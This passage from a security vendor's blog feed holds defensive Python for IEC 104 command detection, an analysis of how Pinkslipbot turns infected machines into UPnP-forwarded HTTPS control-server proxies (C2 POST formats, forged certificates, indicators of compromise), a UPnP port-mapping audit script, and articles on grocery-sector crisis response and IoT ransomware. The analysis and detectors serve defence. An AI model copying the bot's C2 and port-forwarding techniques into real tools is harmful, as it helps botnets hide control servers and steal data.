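ELEMENT_SIZE = {1: 1, 3: 1, 45: 1, 46: 1, 47: 1, 48: 3, 49: 3, 50: 5, 51: 5,
                58: 8, 59: 8, 60: 8, 61: 10, 62: 10, 63: 12, 64: 12}
COT_ACTIVATION = 6           # cause of transmission: a command being issued by the master
U_FUNCTIONS = {0x07: "STARTDT act", 0x0B: "STARTDT con", 0x13: "STOPDT act",
               0x23: "STOPDT con", 0x43: "TESTFR act", 0x83: "TESTFR con"}


def split_apdus(stream):
    """Cut a TCP payload into APDUs using the start byte 0x68 and the length octet."""
    frames, pos = [], 0
    while pos < len(stream):
        if stream[pos] != 0x68 or pos + 2 > len(stream):
            raise ValueError("desynchronised at offset %d" % pos)
        end = pos + 2 + stream[pos + 1]
        if end > len(stream):
            raise ValueError("truncated APDU at offset %d" % pos)
        frames.append(stream[pos:end])
        pos = end
    return frames


def parse_apdu(frame):
    """Decode the 6-byte APCI and, for I-format frames, the ASDU behind it."""
    if len(frame) < 6 or frame[0] != 0x68 or len(frame) != frame[1] + 2:
        raise ValueError("malformed APDU")
    c1, c2, c3, c4 = frame[2:6]
    if c1 & 0x01 == 0:                        # I-format: numbered frame carrying an ASDU
        apdu = {"format": "I", "send_seq": (c1 | c2 << 8) >> 1, "recv_seq": (c3 | c4 << 8) >> 1}
        apdu.update(parse_asdu(frame[6:]))
        return apdu
    if c1 & 0x03 == 0x01:                     # S-format: bare acknowledgement
        return {"format": "S", "recv_seq": (c3 | c4 << 8) >> 1}
    return {"format": "U", "function": U_FUNCTIONS.get(c1, "unknown")}   # U-format


def parse_asdu(asdu):
    """Fixed IEC 104 ASDU header (type, VSQ, 2-byte COT, 2-byte common address) plus objects."""
    if len(asdu) < 6:
        raise ValueError("ASDU too short")
    type_id, vsq, cot_byte, originator, common_addr = struct.unpack("<BBBBH", asdu[:6])
    result = {"type_id": type_id, "cot": cot_byte & 0x3F, "negative": bool(cot_byte & 0x40),
              "originator": originator, "common_addr": common_addr, "objects": []}
    size = ELEMENT_SIZE.get(type_id)
    if size is None:
        return result                          # header only for types not decoded here
    count, sequence = vsq & 0x7F, bool(vsq & 0x80)
    pos, ioa = 6, None
    for i in range(count):
        if not sequence or i == 0:             # SQ=1: a single IOA, then contiguous elements
            ioa = asdu[pos] | asdu[pos + 1] << 8 | asdu[pos + 2] << 16
            pos += 3
        else:
            ioa += 1
        element = asdu[pos:pos + size]
        if len(element) < size:
            raise ValueError("truncated information object")
        pos += size
        obj = {"ioa": ioa, "raw": bytes(element)}
        if type_id in (45, 58):                # SCO: bit 0 = state, bit 7 = select(1)/execute(0)
            obj.update(state=element[0] & 0x01, select=bool(element[0] & 0x80))
        elif type_id in (46, 59):              # DCO: bits 0-1 = state (1 OFF, 2 ON), bit 7 = S/E
            obj.update(state=element[0] & 0x03, select=bool(element[0] & 0x80))
        result["objects"].append(obj)
    return result


def flag_control_commands(apdus):
    """Detection rule: an I-frame whose ASDU is a control type with COT=activation is a command
    being pushed to the field. Confirmations from the RTU (COT 7) are deliberately not flagged."""
    alerts = []
    for apdu in apdus:
        if apdu.get("format") != "I" or apdu["type_id"] not in CONTROL_TYPE_IDS:
            continue
        if apdu["cot"] != COT_ACTIVATION:
            continue
        for obj in apdu["objects"]:
            alerts.append({"type_id": apdu["type_id"], "name": CONTROL_TYPE_IDS[apdu["type_id"]],
                           "common_addr": apdu["common_addr"], "ioa": obj["ioa"],
                           "select": obj.get("select"), "state": obj.get("state")})
    return alerts


# Constructed payload: STARTDT, a spontaneous single-point indication from the RTU, then a
# select/execute single command, the RTU's activation confirmation, and a double command.
SAMPLE_STREAM = bytes.fromhex(
    "68 04 07 00 00 00"                                  # U: STARTDT act
    "68 0E 00 00 00 00 01 01 03 00 01 00 00 10 00 01"    # I: M_SP_NA_1, COT 3, IOA 4096 = ON
    "68 0E 02 00 02 00 2D 01 06 00 01 00 00 10 00 81"    # I: C_SC_NA_1 select ON, COT 6
    "68 0E 02 00 04 00 2D 01 07 00 01 00 00 10 00 81"    # I: C_SC_NA_1 activation confirmation, COT 7
    "68 0E 04 00 04 00 2D 01 06 00 01 00 00 10 00 01"    # I: C_SC_NA_1 execute ON, COT 6
    "68 0E 06 00 06 00 2E 01 06 00 01 00 01 10 00 01"    # I: C_DC_NA_1 execute OFF, IOA 4097
)
```

Running `flag_control_commands([parse_apdu(f) for f in split_apdus(SAMPLE_STREAM)])` yields three alerts (the select, the execute and the double command) and stays silent on the monitoring data and on the RTU's confirmation. In a monitoring deployment the rule would additionally key on the source address, since commands from anything other than the known SCADA master are the real signal.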

To stay up-to-date on this cyberthreat and others like it, make sure to follow @McAfee and @McAfee_Business.

McAfee Discovers Pinkslipbot Exploiting Infected Machines as Control Servers; Releases Free Tool to Detect, Disable Trojan
https://securingtomorrow.mcafee.com/mcafee-labs/mcafee-discovers-pinkslipbot-exploiting-infected-machines-as-control-servers-releases-free-tool-to-detect-disable-trojan/
Fri, 16 Jun 2017 19:11:20 +0000

The post McAfee Discovers Pinkslipbot Exploiting Infected Machines as Control Servers; Releases Free Tool to Detect, Disable Trojan appeared first on McAfee Blogs.

McAfee Labs has discovered that the banking malware Pinkslipbot (also known as QakBot/QBot) has used infected machines as control servers since April 2016, even after a security product has removed its capability to steal personal and financial data from the infected machine. These machines include home users’ computers, which usually sit behind a network address translation (NAT) router. To reach them, Pinkslipbot uses Universal Plug and Play (UPnP) to open ports so that anyone on the Internet can connect to the infected machine. As far as we know, Pinkslipbot is the first malware to use infected machines as HTTPS-based control servers and the second executable-based malware, after the infamous W32/Conficker worm in 2008, to use UPnP for port forwarding.

Pinkslipbot is a notorious banking-credential harvester that has been active since 2007. It primarily targets users and enterprises located within the United States and includes components for password stealers, keyloggers, and man-in-the-browser attacks that are used as vectors to steal various kinds of information—including credit cards, social security numbers, online account credentials, email passwords, digital certificates, etc. Pinkslipbot controls a large botnet of more than 500,000 infected machines and steals over a half-million records every day. As a result, this malware has been documented extensively by the antimalware industry. The malware authors are clearly benefiting from Pinkslipbot; they have maintained the code base since 2007 and regularly add new features to it.

When Pinkslipbot resurfaced in December 2015, we analyzed the samples and published our findings at the Virus Bulletin Conference (VB2016) in October 2016. That report described its use of “ATSEngine” to automatically transfer money from bank accounts that belonged to infected users. At the time, Pinkslipbot was equipped with a domain generation algorithm with antisinkhole capabilities to locate its control server. After April 26, 2016, the malware sidelined the algorithm as a backup option in favor of a list of control server IP addresses embedded within every sample. Because many of the IP addresses belonged to legitimate organizations, we believed the malware authors intentionally included them to deter the cybersecurity industry from blacklisting all IP addresses en masse.

Turns out we were wrong in that assessment. We have discovered that the list of IP addresses consists solely of infected machines that serve as HTTPS-based proxies to the actual control servers. This setup (shown in the following diagram) is used to mask the real IP addresses of the Pinkslipbot control servers.

Figure 1: Layout of a typical Pinkslipbot control server.

Our VB2016 paper also showed how all server components (control server, JavaScript-download server, exploit kit servers) were interchangeable and contained the same functionality. This information continues to hold true with this new discovery. All control server-related information described as follows has been observed on other server components used by Pinkslipbot.

From infected machine to control server proxy

The exact procedure of determining whether an infected machine is eligible to be a control server proxy is unknown. However, we believe this decision depends on an infected machine’s satisfying a combination of three factors.

  • IP address located in North America
  • High-speed Internet connection
  • Capability to open ports on an Internet gateway device using UPnP

To gauge the Internet connection speed, the malware downloads an image from Comcast’s Speed Test service from four locations in the United States.

  • http://sanjose.speedtest.comcast.net/speedtest/random750x750.jpg?x={random}&y=1
  • http://boston.speedtest.comcast.net/speedtest/random750x750.jpg?x={random}&y=1
  • http://jacksonville.speedtest.comcast.net/speedtest/random750x750.jpg?x={random}&y=1
  • http://houston.speedtest.comcast.net/speedtest/random750x750.jpg?x={random}&y=1

Once the downloads are complete, the results of the speed test are sent to the control server.

The Pinkslipbot binary then uses the miniupnpc library to issue a Simple Service Discovery Protocol packet and look for the following UPnP devices:

  • urn:schemas-upnp-org:device:InternetGatewayDevice:1
  • urn:schemas-upnp-org:service:WANIPConnection:1
  • urn:schemas-upnp-org:service:WANPPPConnection:1
  • upnp:rootdevice

Figure 2: Pinkslipbot’s device discovery over the Simple Service Discovery Protocol.

Once devices are discovered, their descriptions are downloaded to look for Internet gateway devices (IGD). This is done by looking for the service type urn:schemas-upnp-org:service:WANCommonInterfaceConfig: in the device description. The IGD is then checked for connectivity (for example, by calling the GetStatusInfo function on the device and confirming the returned response is “Connected”) and the external IP address is retrieved using the GetExternalIPAddress() function on the device.

Once an IGD is discovered, port-forwarding rules are created by using the AddPortMapping function on the IGD.

Figure 3: Disassembled code showing port mapping functionality.

The malware attempts to port-forward 27 internal and external ports: 443*, 465*, 990*, 993, 995*, 1194, 2078*, 2083, 2087, 2222*, 3389, 6881, 6882, 6883, 8443*, 32100, 32101, 32102, 32103*, 50000, 50001, 50002, 50003, 50010, 61200*, 61201*, 61202.

The ports marked with an asterisk were in use by Pinkslipbot control servers as of June 2017.

If any port-forwarding request succeeds (and if other open ports are found), the malware saves the port number into a buffer and removes the port-mapping rule. The port-forwarding results are submitted to the control server using an HTTP POST request:

URL: hxxps://{control server-IP-Address}:{Port}/bot_serv
POST-DATA:
cmd=1&msg={obfuscated-string}&ports=993,80,465,21,50000,61200,61202

Based on this data, the malware author decides whether the infected machine can be used as a control server. Once an infected machine is selected, the “wgetexe” control server command (more accurately, command 25 using control server protocol Version 14) is issued to the infected machine to download a Trojan binary as “tmp_{timestamp}.exe.” This sample is responsible for the control server proxy communication, as we shall explain.

The downloaded Trojan is a dropper for the proxy component. It creates the following files either in %APPDATA% or %ALLUSERSPROFILE%, depending on the operating system.

  • HardwareMonitor\hardwaremonitor.dll
    • The proxy component
  • HardwareMonitor\hardwaremonitor.ini
    • Contains the Pinkslipbot BOTID stored under the field “n”
    • Contains available ports for mapping stored under the field “prt”

The file hardwaremonitor.dll (named supernode_con.dll by the malware authors) is registered as a new “hwmon” service that is launched through rundll32.exe by calling one of its export functions (HwmonServerMainNT or HwmonServerMain). A firewall rule is also created for rundll32.exe.

When launched as a service, the proxy component creates port-forwarding rules (using the description “NAT-PMP {port} tcp”) just as with the original Pinkslipbot sample but it does not remove them this time. The infected machine can now be used as a control server over HTTPS. The proxy component at this stage will contact the real control server via one of its hardcoded proxy servers with the following HTTPS POST request:

URL: https://{proxy-IP}/gwsup
POST-DATA:n={BOTID}&rt={IsWinNT}&prt={UPnP-Forwarded-Port}&os={OS-Version}&ver={MajVer}.{MinVer} &upnp_stat={UPnP-Status}&upnp_descr={UPnP-Port-Forward-Description}

Once the infected machine receives a control server request from a new Pinkslipbot infection, it routes all traffic to the real control servers via an additional proxy using the popular libcurl URL transfer library. As with the original malware, the responses from the real control servers are parsed and digital signatures verified using a hardcoded RSA public key (using the MatrixSSL library). To mask its presence to the outside world, responses from the real control servers (which run Apache) are modified to look like they were hosted on a server running nginx Version 1.9.12.

Figure 4: A fake server name used by Pinkslipbot.

This step agrees with our previous findings from the VB2016 paper, in which we saw an nginx server responding with a specific error message (see Page 6) during control server communication that indicated the presence of a curl-based proxy server residing on Pinkslipbot control servers. However, at the time we were not sure how this was implemented or where the curl component resided. The presence of the same error message in the proxy component DLL confirms its purpose for responding to control server requests.

Figure 5: The missing component from 2016 has been identified based on the error message.

Two custom HTTP headers are also passed to the hardcoded proxy servers to indicate the IP address of the infected machine making the request and the Pinkslipbot BOTID of the infected machine serving as the proxy server.

Custom HTTP headers and what they carry:

  • X-FORWARDED-FOR-CLIENT: IP address of the infected machine making the request.
  • X-FORWARDED-FOR-GATEWAY2: the Pinkslipbot BOTID of the infected machine serving as a control server proxy.

Because the Pinkslipbot control server protocol is based on HTTPS, it needs a server-side certificate to operate. It gains this on the fly by generating new self-signed certificates for every new connection using the OpenSSL library built with libcurl. The generated certificates are issued random values for the following certificate attributes:

Certificate attributes given random values:

  • C: country
  • ST: state
  • L: locality
  • STREET: street
  • O: organization
  • OU: organizational unit
  • CN: common name

Figure 6: Server certificate generation code from Pinkslipbot.

The malware authors take some extra effort to make the generated certificates appear legitimate by ensuring that:

  • The organization attribute ends with either Inc. or LLC.
  • The common name attribute uses one of the following top-level domains:
    • .com
    • .net
    • .org
    • .biz
    • .us
    • .info
    • .mobi

User recommendations

UPnP assumes that local applications and devices are trustworthy, offers no security protections, and is therefore open to abuse by any infected machine on the network. We have observed multiple Pinkslipbot control server proxies hosted on separate computers on the same home network, as well as on what appears to be a public Wi-Fi hotspot.

The port-forwarding rules created by Pinkslipbot are too generic to remove automatically without risking accidental network misconfiguration, and because most malware does not touch port forwarding, antimalware products may not revert such changes. This means your computer may remain reachable from the Internet even after your antimalware product has removed every Pinkslipbot binary from the system. To make sure your computers are not unintentionally exposed, we encourage you to download the free utility described in the next section, which looks for Pinkslipbot control server proxy infections and removes the malicious port mappings.

Even without the UPnP elements, Pinkslipbot is a dangerous Trojan capable of causing a lot of damage. A few years ago it gained attention for locking out Active Directory accounts while spreading across networks by brute-forcing credentials. We recommend following the recommendations published in the McAfee Threat Advisory for W32/Pinkslipbot.

From a general cybersecurity perspective, we were surprised to see a banking Trojan use a complicated multistage proxy for HTTPS-based control server communication, especially one that uses UPnP to repurpose home user infections as control servers. Aside from a 2008 proof of concept created by security researchers and the W32/Conficker worm in late 2008, information about malicious use of UPnP by malware is scarce. We expect this to change soon, as more people use routers with built-in UPnP capabilities (enabled by default) than in 2008. Many Internet of Things devices work over UPnP and are steadily being installed and used by more people every day. As they become more ubiquitous, cybercriminals will see opportunities to use UPnP maliciously. We recommend that users keep tabs on their local port-forwarding rules and disable UPnP on their home routers unless they need it.

Pinkslipbot Control Server Proxy Detection and Port-Forwarding Removal Tool

If your system has been infected with W32/PinkSlipbot (Qakbot/QBot), your machine may still be serving as a control server proxy for the malware. Even if all malicious components have been removed by your security product, your computer may be vulnerable to attacks if it is accessible over the Internet. To help identify this vulnerability on your computer and network, we have developed a free port-forwarding detection and removal tool specific to this malware. This utility will also detect the Pinkslipbot control server proxy service if found and disable (though not remove) the service.

The tool can be downloaded here. By default, the tool operates in detect mode, in which no changes are made to your system or router configuration even if malicious elements are found.

Figure 7: The McAfee Pinkslipbot Control Server Proxy Detection and Port-Forwarding Removal Tool operating in its default “detect only” mode.

If the tool finds malicious port-forwarding rules or a malicious service, pass the “/del” command line argument to disable the service and remove the port-forwarding rules.

Figure 8: The McAfee Pinkslipbot Control Server Proxy Detection and Port-Forwarding Removal Tool operating in “detect and disable” mode.
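The same detect-first, delete-on-request logic can be built on the router's own UPnP interface, which is how an administrator can audit hosts the McAfee tool does not run on. The following is an added example and not McAfee's tool: it walks the WANIPConnection:1 mapping table with GetGenericPortMappingEntry, matches each entry against the indicator from this post (TCP, a description of the form "NAT-PMP {port} tcp" that names its own port, no lease expiry, one of the 27 ports), and calls DeletePortMapping only when asked. It assumes the IGD control URL is already known (it comes from SSDP discovery and the device description, not shown here); the sample XML replies are constructed for the offline checks, not captured from a device.

```python
# Added example (not McAfee's tool): audit a router's UPnP port mappings for the
# Pinkslipbot indicator and remove hits only on request. The IGD control URL is assumed
# known; sample replies are constructed, not captured from a real device.
import re
import xml.etree.ElementTree as ET
from urllib.error import HTTPError
from urllib.request import Request, urlopen

WANIP = "urn:schemas-upnp-org:service:WANIPConnection:1"
PINKSLIPBOT_PORTS = {443, 465, 990, 993, 995, 1194, 2078, 2083, 2087, 2222, 3389,
                     6881, 6882, 6883, 8443, 32100, 32101, 32102, 32103,
                     50000, 50001, 50002, 50003, 50010, 61200, 61201, 61202}
DESCRIPTION_RE = re.compile(r"^NAT-PMP (\d+) tcp$")


def soap_envelope(action, args):
    """SOAP body for one WANIPConnection:1 action; args is a list of (name, value) pairs."""
    body = "".join("<%s>%s</%s>" % (name, value, name) for name, value in args)
    return ('<?xml version="1.0"?>'
            '<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" '
            's:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body>'
            '<u:%s xmlns:u="%s">%s</u:%s></s:Body></s:Envelope>' % (action, WANIP, body, action))


def soap_call(control_url, action, args):
    """POST one action to the IGD control URL and return the raw XML reply."""
    request = Request(control_url, soap_envelope(action, args).encode("utf-8"),
                      {"Content-Type": 'text/xml; charset="utf-8"',
                       "SOAPAction": '"%s#%s"' % (WANIP, action)})
    return urlopen(request, timeout=5).read().decode("utf-8", "replace")


def parse_mapping_reply(xml_text):
    """Flatten a GetGenericPortMappingEntryResponse into a dict (namespace-agnostic)."""
    fields = {}
    for element in ET.fromstring(xml_text).iter():
        tag = element.tag.split("}")[-1]
        if tag.startswith("New"):
            fields[tag[3:]] = (element.text or "").strip()
    return {"remote_host": fields.get("RemoteHost", ""),
            "external_port": int(fields["ExternalPort"]),
            "protocol": fields["Protocol"].upper(),
            "internal_port": int(fields["InternalPort"]),
            "internal_client": fields["InternalClient"],
            "description": fields.get("PortMappingDescription", ""),
            "lease_duration": int(fields.get("LeaseDuration") or "0")}


def is_pinkslipbot_mapping(mapping):
    """Indicator from the post: TCP, 'NAT-PMP {port} tcp' naming its own port, permanent lease, known port."""
    match = DESCRIPTION_RE.match(mapping["description"])
    return (mapping["protocol"] == "TCP" and match is not None
            and int(match.group(1)) == mapping["external_port"]
            and mapping["external_port"] in PINKSLIPBOT_PORTS
            and mapping["lease_duration"] == 0)


def enumerate_mappings(control_url, limit=256):
    """Walk the table by index; a past-the-end index comes back as a SOAP fault (HTTP 500, UPnP error 713)."""
    mappings = []
    for index in range(limit):
        try:
            reply = soap_call(control_url, "GetGenericPortMappingEntry",
                              [("NewPortMappingIndex", index)])
        except HTTPError as err:
            if err.code == 500:
                break
            raise
        mappings.append(parse_mapping_reply(reply))
    return mappings


def delete_mapping(control_url, mapping):
    """DeletePortMapping is keyed on remote host, external port and protocol."""
    soap_call(control_url, "DeletePortMapping",
              [("NewRemoteHost", mapping["remote_host"]),
               ("NewExternalPort", mapping["external_port"]),
               ("NewProtocol", mapping["protocol"])])


def scan(control_url, delete=False):
    """Detect-only by default, like the McAfee tool; delete=True plays the role of its /del switch."""
    hits = [m for m in enumerate_mappings(control_url) if is_pinkslipbot_mapping(m)]
    if delete:
        for hit in hits:
            delete_mapping(control_url, hit)
    return hits


def sample_reply(external_port, internal_client, description, lease="0"):
    """Constructed reply in the shape an IGD returns for GetGenericPortMappingEntry."""
    return ('<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body>'
            '<u:GetGenericPortMappingEntryResponse xmlns:u="%s">'
            '<NewRemoteHost></NewRemoteHost><NewExternalPort>%d</NewExternalPort>'
            '<NewProtocol>TCP</NewProtocol><NewInternalPort>%d</NewInternalPort>'
            '<NewInternalClient>%s</NewInternalClient><NewEnabled>1</NewEnabled>'
            '<NewPortMappingDescription>%s</NewPortMappingDescription>'
            '<NewLeaseDuration>%s</NewLeaseDuration>'
            '</u:GetGenericPortMappingEntryResponse></s:Body></s:Envelope>'
            % (WANIP, external_port, external_port, internal_client, description, lease))


SAMPLE_REPLIES = [
    sample_reply(443, "192.168.1.23", "NAT-PMP 443 tcp"),           # Pinkslipbot proxy
    sample_reply(32400, "192.168.1.10", "Plex Media Server"),        # benign mapping
    sample_reply(61200, "192.168.1.23", "NAT-PMP 61200 tcp"),       # Pinkslipbot proxy
    sample_reply(2222, "192.168.1.5", "NAT-PMP 2222 tcp", "3600"),   # leased: not the indicator
    sample_reply(8080, "192.168.1.23", "NAT-PMP 8080 tcp"),         # port not in the list
]
```

Against a live router, `scan("http://192.168.1.1:1900/ipc")` (a hypothetical control URL) lists the matching entries and changes nothing; `scan(url, delete=True)` removes them. The description check requires the port in the text to equal the mapped port, which keeps the rule from firing on the similarly named entries that legitimate NAT-PMP clients create, and the lease check mirrors the "no expiration time" detail in the indicators below.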

Indicators of compromise

  • One or more of these files:
    • %APPDATA%\HardwareMonitor\hardwaremonitor.dll
    • %ALLUSERSPROFILE%\HardwareMonitor\hardwaremonitor.dll
    • %APPDATA%\HardwareMonitor\hardwaremonitor.ini
    • %ALLUSERSPROFILE%\HardwareMonitor\hardwaremonitor.ini
  • A service created with the name “hwmon” and binary path containing “rundll32.exe.”
  • TCP port forwards enabled for one of these ports using description “NAT-PMP {port} tcp” and no expiration time:
    • 443, 465, 990, 993, 995, 1194, 2078, 2083, 2087, 2222, 3389, 6881, 6882, 6883, 8443, 32100, 32101, 32102, 32103, 50000, 50001, 50002, 50003, 50010, 61200, 61201, 61202
  • Connections from and to these IP addresses:
    • 158.255.2.138
    • 185.162.8.190
    • 185.169.229.168

Sample hashes

  • Proxy component droppers
    • 22cf76f92aad53db1304dec026b834ad77d2272c7f2eaaabf299e953b98d570e
    • c23fe9f3a3035edb6fa306c7545cfd05bb310d85983dda5914cd9650c13b41d3
  • Proxy component DLL (internal name: supernode_con.dll)
    • 730e9864795ed8d6538064551ab95505dff3e92dd67888bee323cb341b2420c6
    • af25c5bed96e046ba1e25749ff51f0d8437a1ef66e469b4fd0348e372abc2f7f
    • 6d174dd4f29da814170e8f7c40ecd80794e1c27d8d94741a79bd1bd6eb75ea62

 

Grocery Industry’s Cybersecurity Challenges: Harbinger Of Threats To Corporate America
https://securingtomorrow.mcafee.com/business/neutralize-threats/grocery-industrys-cybersecurity-challenges-harbinger-of-threats-to-corporate-america/
Fri, 16 Jun 2017 17:44:54 +0000

The post Grocery Industry’s Cybersecurity Challenges: Harbinger Of Threats To Corporate America appeared first on McAfee Blogs.

Button up your overcoat; it’s about to rain cyberthreats

Few businesspeople have as much on the line every moment of every day as grocers. When disquieting events happen at a grocery store, customers can be more than just inconvenienced. In extreme circumstances, grocery products can be the cause of illness, even death.

What makes the grocery industry so susceptible to calamities is that food is a necessity, not a luxury. Threats to food safety have the potential to create panic. If a company is the sole retailer affected, there’s a sobering chance it could lose customers – but perhaps only temporarily. The length of customers’ disaffection all depends on the effectiveness of the company’s response.

What constitutes an effective response? When it comes to cybersecurity, it is not always easy to say. It is scary, but as a discipline, responding to data breaches, ransomware, malware, phishing and other cybersecurity incidents is still in its infancy. There is no single widely accepted standard for what an adequate incident response looks like, leaving “reasonable” action in the eye of the beholder. One thing is for sure: the miracle of the Internet is being weaponized by a myriad of bad actors.

The specter of malicious product tampering or computer hacks that prevent items from being properly refrigerated are among the risks that keep grocers awake at night. In many ways, they’re a microcosm of the pressures faced these days by corporate CEOs, communications executives, and their legal counsel. Fears surrounding cybersecurity and attendant liability nightmares have become Corporate America’s #1 risk management concern. For the past decade, the threat of hacking was largely limited to information. Now, life, health, and safety are becoming the real exposure, and few companies are ready, though all will face attacks. If a company thinks its prophylaxis is sufficient, it is wrong. If it thinks free credit reporting is still a satisfactory response, it is more unprepared than it realizes.

In early June, I was among the crisis response specialists invited to participate in a crisis management conference organized by Pillsbury Winthrop Shaw Pittman LLP. The panel was given a cybersecurity scenario that involved a ransomware breach disrupting customer transactions in dozens of stores across a nationwide chain.

The scenario cut right to the heart of the grocery industry’s biggest fear: the reputational impact of a liability or injury lawsuit stemming from a single incident, an episode whose repercussions could overwhelm decades of conscientious customer and community service.

Here’s the strategic premise I shared for grocery industry executives caught in the klieg lights: from the moment the crisis hits, their brand reputation hinges on empathetic communications that keep their customers front and center. Yes, regulatory and legal liability will set a threshold for their response, but their efforts to go above and beyond mere compliance will be what customers remember. As cybercrime gets more sophisticated, audiences from customers to shareholders expect a fuller response. “Hey, we are a victim, too,” will only get you so far, and less and less each day.

A company should frame its response through the prism of its customers – a young mom trying to get food for her children, or a son that needs to pick up medicine for his sick father, or a family living paycheck to paycheck.

Always act out of an abundance of compassion and caution, I counseled. Anticipate the health-and-safety questions customers are likely to have and develop emotionally resonant answers. Identify resourceful ways to make their lives easier. A response that surmounts basic regulatory requirements will cultivate good will and could win over lifelong customers.

With that in mind, I advised industry executives to use all channels available to communicate with consumers, from signage at store shelves to social media and online postings. They should also consider stationing employees outside each affected store to talk with customers as they arrive. Employees who are the face of the company are often best equipped to explain facts, answer questions, and gather insight into customer concerns.

Not only do grocery stores face the same cyberthreats that other retailers face, but they also have tremendous financial capital at risk if a significant event disturbs refrigeration or inventory systems. These additional operational systems must be considered in a company’s Incident Response Plan, just as they would be in Business Continuity planning for bad weather power outages.

It is imperative companies establish Business Continuity Plans, Incident Response Plans, and Crisis Communications Plans. Those plans should be examined against detailed risk assessments and help guide employee training. Plans should be validated through simulated exercises. This builds a culture where cybersecurity is a priority and employees understand their role in protecting the brand.

Tom Campbell, the head of Pillsbury’s crisis management practice and the host of the conference, warns that, “Failing to prevent a cyber breach will injure a company but failing to rapidly respond to the crisis that follows can kill it.”

Brian Finch, co-chair of Pillsbury’s Privacy, Data Protection, and Cybersecurity team, adds that, “Businesses of all stripes have to understand that today’s cyberthreats go well beyond simple ‘smash and grab’ data thefts. Their preparation, and by extension their legal exposure, must be attuned to stopping or minimizing the impact of cyberattacks that could slow or stop their revenue intake.”

Cyberattacks, data breaches, and information security issues have become so pervasive that people may generally forgive companies for a breach – but not for slipshod communications about it. And not for failing to take proactive measures to protect information and assets in the first place, whether it’s installing the latest patches or conducting security penetration tests.

Cybersecurity is not just a technology issue. It’s a risk management issue. Everyone in the company should understand the company’s objectives when it comes to cybersecurity and incident response. Employees are a critical first audience for security messaging and communications; it is inevitable that they will receive questions when an incident occurs.

When it comes to messaging to external stakeholders – from investors to industry analysts to consumers – the critical component is quick and consistent messaging. Telling key audiences what happened, what the company is doing to fix it, and what it is doing to prevent the episode from happening again is paramount.

The fact is that a company’s risk will never be zero. When it comes to cybersecurity and data breaches, the old axiom “Not if, but when” has never been more true.

Richard Levick, Esq., @richardlevick, is Chairman and CEO of LEVICK. He is a frequent television, radio, online, and print commentator.

This article was written by Richard Levick from Forbes and was legally licensed through the NewsCred publisher network. Please direct all licensing questions to legal@newscred.com.

Beware the next wave of cyber threats: IoT ransomware
https://securingtomorrow.mcafee.com/business/neutralize-threats/beware-the-next-wave-of-cyber-threats-iot-ransomware/
Thu, 15 Jun 2017 19:56:42 +0000

Ransomware has become one of the most serious cyber threats plaguing organizations. Today, all of us – from home users to corporations and government organizations – are trying to protect ourselves from encryption viruses.

But we are ignoring the beginning of the next wave of ransomware attacks – aimed at encrypting IoT devices. These attacks can be much more dangerous given the omnipresent and extremely diverse nature of the Internet of Things.

Quite simply, there are some differences that make IoT ransomware more dangerous than the already widespread extortion viruses for desktops and smartphones.

IoT ransomware does not encrypt your data

The best-known and most active crypto-ransomware families, such as Locky and Cerber, encrypt important files on infected machines. Their main strength is irreversibility: victims must either pay for the decryption key or say goodbye to their files if there are no backups. Files and data are usually assumed to have a value expressed in money, and that is what attracts extortionists.

Many IoT devices hold little or no data of their own, so one might assume ransomware authors have no interest in them. That is not the case.

Instead of locking a few files, IoT ransomware can lock and take complete control of many devices, and even whole networks. IoT malware may stop vehicles, cut the electricity and halt production lines. Such programs can do far more harm, so attackers can demand much larger ransoms, which makes the new underground market all the more attractive.

One could argue that IoT hacking can be stopped with a simple reboot. However, the incentive to pay extortionists does not result from irreversibility but rather from the volume and character of potential losses which may occur during the time you lose control over the system.

As the Internet of Things extends into life-supporting devices such as pacemakers and into industrial systems such as pumping stations, the financial payoff from blocking IoT infrastructure, and the damage done by a belated response, will grow sharply. Organizations that use the Internet of Things in industrial control systems are the most exposed: power plants, large automated production lines and the like.

Consumer IoT devices

Attacks on consumer IoT devices, including smart homes and connected cars, are already real. Researchers have shown how they can take control of a connected thermostat with malicious code and crank the temperature to its maximum until the owner pays a ransom.

Imagine you get into a connected car this morning and a message appears on the screen: “If you pay $500, I’ll let you get to work today.” A few years ago that was impossible; with today’s technology, such a scenario no longer looks far-fetched.

Furthermore, IoT ransomware may steal important data and personal information, for example, from surveillance cameras connected to the network or from fitness gadgets and then blackmail people, threatening to publish their sensitive information.

Despite the fact that IoT devices often have serious security weaknesses, it is still premature to talk about the imminent ransomware threat for smart homes and connected cars. The wide variety of apps and devices created by thousands of manufacturers complicates extensive malware usage.

The IoT industry is highly fragmented. It lacks standardized approaches, common platforms and communication systems, which makes mass attacks hard to carry out. Each compromise targets a specific type of device, which limits the number of potential victims.

We can conclude that attackers currently gain little from attacking consumer IoT devices. That is likely to change as the Internet of Things penetrates deeper into our homes and offices.

Industrial segment already facing high risks

We see an entirely different picture in the industrial segment of the Internet of Things. Industrial systems are already very attractive to cyber extortionists: any system that affects the lives of thousands or millions of people and is extremely expensive to operate qualifies.

For example, several US hospitals have recently suffered ransomware attacks. Normal operations at Hollywood Presbyterian Hospital were disrupted by ransomware: some patients had to be moved to other clinics, and doctors went back to keeping records the old-fashioned way, on paper.

If a hospital system is compromised, it puts the health of patients at risk. The likelihood is very high that the hospital will pay upon demand. An attack against critical infrastructure can be carried out successfully based on similar factors – if lives of people might be put in danger and time is pressing, the owners would often agree to pay up.

Power grids and power stations can be another important target for IoT malware. Their important role in the modern world was perfectly illustrated as far back as the Northeast blackout of 2003. It caused $6 billion in losses within several hours, affecting 55 million people. It wasn’t a cyber attack but a software failure. Today, hackers constantly scan the Internet for important and vulnerable networks, so energy companies should be prepared.

How to protect IoT systems from ransomware

Although there is no universal solution, many experts believe that the observance of certain guidelines and methodologies can help organizations and manufacturers better protect their IoT systems from ransomware.

One of the important points is the ability to remotely upgrade the firmware of smart devices. Security is a journey, not a destination, and no connected device stays secure forever. A firmware update should therefore be a simple, effective and safe process.

The last point matters most, because an insecure update channel is itself an entry point for infection. There are time-tested measures to close it: cryptographically sign firmware images and have the device verify the signature, and refuse downgrades, before installing anything; lock the boot process so that only verified firmware runs; and encrypt the communication channels between devices and the update service.
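The signed-and-versioned update check described above, as an added example that is not part of the original article. It is written in Go with the standard library’s Ed25519 implementation; the manifest layout, the choice of Ed25519 and the deterministic key seed are assumptions of this example, not something the article specifies.

```go
package main

import (
	"bytes"
	"crypto/ed25519"
	"crypto/sha256"
	"encoding/binary"
	"errors"
	"fmt"
)

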